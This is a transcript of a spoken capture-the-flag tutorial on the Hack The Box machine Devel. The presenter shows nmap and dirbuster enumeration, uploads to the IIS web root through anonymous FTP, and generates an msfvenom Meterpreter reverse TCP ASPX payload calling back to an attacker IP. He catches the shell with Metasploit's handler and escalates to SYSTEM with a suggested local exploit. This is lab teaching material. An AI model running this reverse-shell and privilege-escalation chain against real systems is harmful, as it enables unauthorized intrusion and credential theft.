All right, guys and girls, we are going to be working on a machine today called Devel, Devel, not IL. Now, this is a nice machine to take a step up. We've been mostly learning about SMB exploitation. Today, we're going to be learning a little bit more about shellcode generation and how we can do a little bit of enumeration. And let's not talk about it yet. Let's do our first thing first kind of deal. Let's go ahead and spin up that machine, right? And let's go ahead and start our nmap scan. So I'm gonna start a new window here. And we're gonna do nmap t4-a p. And again, for the second video in a row, I've already forgotten what the IP address is. It's .5. We're gonna scan .5. And we will let that scan. So in my common stalling tactic, let's talk about the machine a little bit more in detail. What we're going to be seeing today is a machine that is very common, at least at the beginner levels of Hack the Box. Now, the exploitation type isn't really as common, but what you're going to see is you're going to see a very common port combination, something along the lines of port 21 and port 80. You see that a lot where you have a website and you have port 21, or you might have port 22 and port 80, and you have to leverage an exploit somewhere in order to get somewhere else. And you're going to see that here in a minute. Now, if you remember back to episode 2, we talked about FTP. Remember, we had FTP in our machine. It was lame, right? We did lame. And we had FTP, and I talked about the staging process, about having to need a place to execute an exploit. And you're going to see that come into play today. How can we leverage FTP if we have anonymous access? And how can we enumerate what is in front of us? So we're going to go ahead and just let this scan finish really quick. And then once the scan finishes, we're going to be looking at it, and we'll talk further into detail. Okay, the scan has returned. So let's take a look here. And as I kind of discussed, we have port 21 and we have port 80 here. Now, there is a little bit of information that is being disclosed to us. Here you can see that we have Microsoft IIS 7.5. Why do we know that? Well, because they're putting it in their headers. Now, on a vulnerability assessment or a pen test, this is a no-no. This is a information disclosure. It's a low finding. It's very low. But all this is here is information disclosure, right? And it's information gathering for us. We want to avoid this if we can. Same thing with the site title IIS. Now, that's beginning to tell me just from experience that we're probably looking at a default web page if the title is going to be IIS 7. On the other front here, we see that there is FTP open with anonymous login. And we can see there are some files in here that, to me, the experienced eye, look as if they are an IIS, a directory, right? A web root directory. So what we're looking at is anonymous login, which again is probably a no-no, right? Why are we allowing people to log in anonymously unless there's a very, very good reason for this? This is probably a ding on an assessment as well. If we scroll down through the rest, it's going to take some guesses at the operating system. It's not a phone. So again, this doesn't really come through that great. I got some trace route, nothing fancy. So we're going to focus here. So what it looks like here is we have a website and we've got FTP. So my enumeration for a website. First things first. The first thing I like to go do is I like to go out to the website, and we'll just go to 10.10.10.5, and you see that it is, in fact, a default web page. If we were to click on this, it would go to Microsoft's website. Now, you see this a lot during pen testing, okay? When we're doing pen testing, we come across these default web pages a lot. Now, this signifies one of two things. One, they have a website out in the open, and they have it running on the back end somewhere at a different directory, right? There's probably a directory to this to a web page they're running, and it may resolve to a domain name. Let's just say Google. It may be like dev.google.com is where they're running on this web server, but when you just navigate to port 80 or port 443, the default web page is still here. This is a finding on a pen test as well. This signifies that there is poor hygiene, right? If we're seeing this, and the other thing that I should mention too is the other part of this is, okay, potentially they're not even running a website. They just have IIS on for whatever reason. Again, same thing, poor hygiene. As an attacker, if I'm seeing default web pages, that makes me think, okay, what other things have you forgot to turn off? Are you a lazy person, a lazy engineer on the other side that I'm up against? Why am I seeing these kinds of things? So because of this, it makes me really inquisitive, right? And when I see default web pages, I think, okay, there's probably a reason that it's up there. And if there is, then there's probably a hidden directory somewhere. So my first thought is, in this instance, is I'm going to look for extra directories. And my favorite tool for that is called dirbuster. Now let's go ahead and open up a new tab. Now dirbuster stands or is short for directory busting. And what we're doing is we're going to brute force directories here. So we'll say directory 1, directory 2, directory 3, right? We'll just try to go through a whole list of directories that we provide and see if any of them come back. Now, we may be able to find some hidden information, especially in capture the flag type stuff and in real world situations where you run into this. So let's go ahead and type in dirbuster. Now, I like to do dirbuster and like this, start its own process. Okay, another thing that I should note is there are other tools that we can use. Dirbuster is my favorite. A lot of people are big on GoBuster right now. I haven't jumped on that train. I've used it sometimes and it works very well. The other one that people like is called Dirb, D-I-R-B. You can use either of those as well and be successful here. So what I'm going to do is I'm just going to copy the web address and should paste in here. It actually didn't. Okay, so we'll have to type in http:// and it likes the port 80 at the end like that. Okay. On top of this, I like to use more threads because we get to go faster when we do that. So on top of that, we need a word list. Here's our word list area. Now, Kali is very nice. If you go to the base here, there is a user folder, share, and then if you start typing word lists, look what you find. There's a word list folder. So again, user, share, word list. Inside of that is dirbuster here. And then there's word list. Now, the one I like to use is the medium, but for this instance, we're just going to use small. And in some cases, if you're really got a lot of time, there is a big word list out on GitHub. If you search for dirbuster big word list, somebody has made one. So let's go ahead and select this word list. Now, if we come down to the bottom down here, what we're going to be looking at, we're going to brute force directories, files. We're going to be recursive. That means if we find something, we find one directory, we're going to go ahead and go on and try to find more directories inside that directory. So this is great. The one thing that we're going to do here is, though, PHP is not what we're searching for. Now this is a Windows machine, right? In highly probability that we're running against a Windows machine because we're running against Microsoft IIS. And we're going to be running against ASM, ASMX file extensions, ASP, ASPX file extensions, probably more probability, right, than we are going to be PHP. If this were an Apache web server, for example, then we would be using a PHP extension. But in this instance, I'm going to hedge my bet that it's not. So we're going to go ahead and say something along the lines of ASM, ASMX, ASP, ASPX. Now that'll search for all 4 extensions. On top of this, I always like to add in some other stuff when I'm doing this in a real world assessment, like a text file, like a zip file, backup file, RAR file, SQL database, etc. You can make this list longer. The longer you make this list, the longer it's going to take, especially if it starts finding directories. Now let's go ahead and hit start on this guy. Now, I'll be honest, I have actually not run directory busting on this. I am just showing you my methodology when I see a web page, and especially when I see something like this. Now, my trained eye, would actually go right here to FTP. Okay, so FTP, I am seeing ASP underscore client, I'm seeing isstart.htm, and I'm seeing welcome.png. If we do a view page source, we come into here and we see what? Welcome.png, right? So we could probably replace this file with a picture of something else if we wanted to. We could just go out to the web and we can go to Google and let's just say something like cute dog, right? We'll take the cute dog. Let's go find an image of one. And let's say I want a JPEG. So, okay, this one's a JPEG. I'm just going to go ahead and save that image out to my desktop, and we'll just call it, dog.jpg. Oops. Okay, dog.jpg. All right. And this is just a proof of concept here that we are indeed in a web folder. So let's go ahead and do this. Let's blow it up. I'm going to change to my desktop, since that's where I put the file. And then let's FTP over to this web, or this machine, I should say. Now it's going to ask for a name, and we saw that anonymous login worked, so we're just going to do anonymous. Okay, and then we have commands. We could say help, and you got a lot of commands, very similar to Linux. You could say ls, pwd. Okay, you could see what directories you have access to. Now, we could enumerate this. We could go into this ASP.NET underscore client and see if there's any files in here, dig deeper, get information out of it. Just to save time purposes, I'm not going to do that, but just know that that's perfectly okay in terms of enumeration. So here, let's go ahead and just do a put. This just means we're going to put something onto the server. I'm going to put dog.jpg onto the server. ls. Looks like it's there. Nice. Okay, so now if we come here and we say /dog.jpg, I don't know what happened to my wonderful picture, but my wonderful picture is somewhat there. So we know that it worked, right? We could put a text file there, whatever. Okay, why is this important? Well, this is important because we talked about this 2 episodes ago. I can put things into this folder, but unless I have a second chain of where I can have somebody execute them, or I can execute them myself, then FTP really isn't that vulnerable to me. But what did we just do? Well, we just came into here and we executed this file, right? We accessed this file. The server read this file and we've executed it. So what's stopping us then from putting malware onto this and doing the same thing? And that's really what I'm after. I want to put some malware onto this machine and I want to exploit it, right? So we're going to do that right now. So what we can do is we can use a tool called MSF Venom. In the last episode, we very, very briefly talked about MSF Venom. And one thing that you can do is if you ever need a cheat sheet, you can just go out to Google and you could say MSF Venom. And no, this is like, you could see cheat sheet right here. You can do something like ASPX and just find something particular. Like this is one that I've been to in the past. You could look at these cheat sheets here. There's a High on Coffee cheat sheet as well. There's a bunch in here that will tell you like, hey, if you're doing it against a Windows machine, or hey, here's ASP right here. And this is really what we're after, right? Because we know that they run ASP, ASPX as an IIS server. So this is the type of file we're going to need. Now, if this were an Apache server, okay, maybe we need an Apache payload, right? Or if it's JSP, or if we're using Tomcat, then we're going to do a WAR file. And we have a bunch of different cheat sheet payloads here. This is perfect. So what we're going to do is we're going to generate a payload. So all we're doing is generating malware. We are generating something that is going to say, hey, I'm listening on this connection, use this payload here, right? And this payload is going to be a interpreter payload. Remember that I told you in the last episode that if I have the opportunity, I will use a interpreter payload. We also could just use a generic Windows exploit payload here. But what we're going to do is we're going to use this type of payload and we're going to exploit it. Okay, so this payload is going to say, hey, use this payload, contact back to me, reverse shell, right? Contact back to me at my listening host, at my listening port, and then let's set a file type and a shell. So let's go ahead and type this out and then we'll talk about it in more detail. So we're going to do MSF Venom, and we're going to do a -p for payload. And this payload should look familiar to you, right? Windows, interpreter, and then we're going to say reverse TCP. Okay, now we don't know if this host is going to be a 32-bit or 64-bit. So let's start with a 32-bit. If we need to improve the payload, we can. All right, so let's do this. We'll say lhost, and then we need our IP address, -10.10.14.24. We need a listening port. We're just going to use all fours for now. And then we are going to say a file type. So I'm going to say ASPX. You could also do ASP, that'll be fine, but ASPX. And then what we're going to do is we're going to put this all into a file. Okay, we could just call this ex.aspx. Now, if we didn't add this into a file here, then this would print out shellcode for us. And we're not at that level right now where we're printing out, copying, and putting into things. We need this to be into its own ASPX file. So when we execute it, it runs the command that it needs to, and it knows that based on the file type and the server we're putting it on is appropriate for this ASPX file type. Okay, so we're going to hit enter now. It's going to take a second to generate, and it's going to put it on the desktop is where we had it. And then once it generates, we need to do one other thing. We need to now open up one more new tab. And then I'm going to go into Metasploit, MSF console, follow along with this, and we're going to run that exploit handler. Now, you saw all of this in the last episode. You just saw it done for us. Now we're going to do this ourselves. Okay, so let's say use exploit multi-handler. Now, we really haven't gotten into netcat yet. But when we do, this is very similar to netcat. We are just listening, right? All we're doing is saying, open up a listener, and on this port, talk back to me at this IP address. And we're just going to be listening on that port. So let's go ahead and just say options. You're going to see that there's literally nothing in here. So what we're going to have to do is we're going to have to set a payload. So the payload has to be identical to what we just generated. So that's going to be payload of Windows. And you should be able to auto tab. It's just a little slow. Interpreter. And then we've got reverse underscore TCP. Options again. Okay, now let's set the lhost to your IP address, your listening host. The port has to match as well. All fours is the default. That's perfect. That's what we chose. Let's go ahead and run this. And now we're just going to let this sit here and it's going to run and listen, okay? So coming back to here, I bet we've lost our connection. Let's see if we have. We have. Okay, let's say bye and connect again. Anonymous, anonymous. Now, let's go ahead and put that ex.aspx file on here. We did it. Perfect. Another thing that I should note too is we are likely transferring via ASCII right now, ASCII. Preferably, we should transfer via binary. So you would type binary and then transfer your file. I think it's okay. But if you ever run into issues with FTP and you're transferring a file or a payload and it's not working, try switching to binary and then transferring the file again and seeing if that fixes anything. I've had that happen in the past. It's better to use binary over ASCII. Okay, so we know how to call out, right? We've got a listener going. We've got our malware uploaded. And so we're waiting here for a connection. Now we need to engage that malware and make the server execute it. So ASPX, ex.aspx here, hit enter. Okay, it engaged. And look, we just got a session. That easy. Okay, so we say sysinfo x86 interpreter. We won the lottery there. We got the right system on everything. Okay, x86 interpreter architecture x86 Windows 7 build, and then we say get UID. Crap, we are not authority system. Darn it. So we can't do things like hash dump right now, right? We're not system. Now there is a tool that we can try to use called get system. Hit enter, didn't work. That's okay. Sometimes you get win from this, but do note that in a rare occasion that actually can crash a machine if you're doing it on a pen test, so be very careful. But one of the favorite things that I wanted to show you, and I talked about it last time, is there are post modules in Meterpreter. So what we can do with our session is we can actually background the session, and then we can say, let's search for this. We'll say search suggester like this. And there's only one, but look, this is a post module here. So let's copy this, and we're gonna say use, paste this, hit enter, and then let's look at our options now. And look what it's gonna ask for. It's gonna say, hey, all I need is a session, because you already have a session. So just give me that and I'll access that session, and we'll do a little bit of enumeration. So this is post exploitation enumeration, okay? So we're gonna say set session to 1, then we're gonna run this. And what this is gonna do is this is gonna look through all the x86 exploits that it knows of that are privilege escalation exploits. It's gonna compare what's going on in the Windows system and say, hey, yeah, that might be good for this, or no, that's not gonna work. And then it's gonna return a list of those that will possibly work for us. Okay, and this will only take a minute. And then what happens is we're gonna go through this list and we're gonna say, okay, I'm gonna try the first one or the second one or the third one, and we're just gonna keep going until we know, if it's vulnerable. Look how many are coming through. So best scenario for us here is we've got 1, 2, 3, 4, 5. We could go through this whole list if we're desperate. The one that I like to use, we could use this bypass event viewer. Let's just go straight for the win here. I believe KitcherPod's gonna work. KitcherPod's pretty friendly. So let's go ahead and say use, paste. Now, I'm gonna show you something. Let's type in options. Okay, let's set the session to 1. And look, it already has our target as Windows 7, that's fine. x86, perfect. So our session's good. And let's type in options again. Okay, look at the screen, remember the screen, see what happens. Now let's hit run. This is not going to work. Okay, we launched a process, we did not get a reverse shell back. Let's type in options again. Look what changed. Now payload options are in here. Why didn't this work? Well, for me, it always tends to default back to my Ethernet interface. I don't know why it does this. So you could, without seeing the screen, if you keep it in the back of your mind, you could just say, hey, I know that I need my L host to be 10.10.14.24. And you know what? I know I'm already on an L port of all 4s. So I'm already listening, or I've already used that port up. Let's do something different. Let's set the L port to 4445. It's fine, right? Let's look at our options now. Okay, and now let's try running this. And let's see if we can get this to work. So, and it might take a second from the first exploitation. It might take a second here. Okay, and what has happened? I've lost my session. So let's go ahead and I'm going to Control C here. What we need to do is we need to set up another listener, and we could probably just tab up a little bit. There we go. And then say options here. Okay, so I'm going to run this again. We just need to execute that payload. Sometimes your listener dies. Hopefully you're a little bit more fortunate than me and yours didn't. You can see now that we've generated again. We've got the shell. We'll be quick about this. We'll go background. You tab up a few times. We've got the KitcherPod in there already. Set the session to 2 instead of 1 because our new session is session 2. And then we'll say options. And now let's go ahead and run it. And it's possible that we killed our session with the failed attempt there. What I actually believe happens is that it tries to connect, and then you potentially lose your session because it closes out the other one to exploit into the new one. So let's try this one here. Okay, and now we ran the session and we're okay. So if you lost your session like me, showing you proof of concept, know in the back of your mind that, hey, I probably want to set an L port on these priv-esc or an L host as well on these priv-esc attempts. And then let's go ahead and say get UID, and you can now see that we're authority system. So same thing as before, we can do a hash dump, look at the hashes. We can go grab the root, the user, whatever, the flags on those. Not going to show you to do that. We can load modules. You've seen that over and over, right? This is kind of becoming repetition. So this is a great way of doing this. My challenge to you is look into payloads. Okay, I don't know what the command is. I believe it's msfvenom-l. Might not be L. There is a payload option in here that lists out all the payloads. Okay, let's do a -l payloads then. And it'll list all the payloads. My suggestion is to go back into this machine, and instead of running Meterpreter, try running a Windows reverse TCP payload or something along those lines. See all these Windows Meterpreter? Let's skip those. Just run a Windows reverse TCP, shell reverse TCP, which is right here. Try doing that as your payload, okay? And with that as your payload, you don't have to use Meterpreter. So what you can do is instead, you can just say, hey, I'm not going to use the exploit handler. I'm going to say netcat mvlp. I'm going to listen on port all fours here, and then just wait for a session to come across. And that's it. Okay, so my challenge to you is to redo this exploit using it manually as opposed to using Metasploit and Meterpreter, and see what your results are. So a little bit of homework. But that is it for this episode. So we took our scan, we looked at some things, and we could check real quick on the dir buster. Like I said, I've never ran it before, and it hasn't found anything, and that's fine. It finished the request. So you know, it's always good to do directory busting. It's also good to run Nikto if this were actually a website. We'll get to Nikto at some point. But if this were a website, good to run Nikto as well. Directory busting, of course, inspect the website. But here, it was really apparent that to a trained eye, that FTP was the way to go because we had execution here. We did a proof of concept with the dog JPEG, and then we were able to generate with MSFVenom a payload and then execute it here and get a shell. And then we also went in and we were able to use the exploit suggester and use that to get another shell. This may be a lot of information, right? This is some new tricks that I'm throwing at you. Please rewatch the video. Please try it on your own as well. Take everything and try the manual way, and then try it again this way as well. See if you can repeat all the steps I did without watching the video, just using your notes. It's always good to have a good notebook, so if you're not doing that already, go ahead and start doing that now. But that is it for this lesson. I am TCM. Until the next one, I really do thank you for joining me.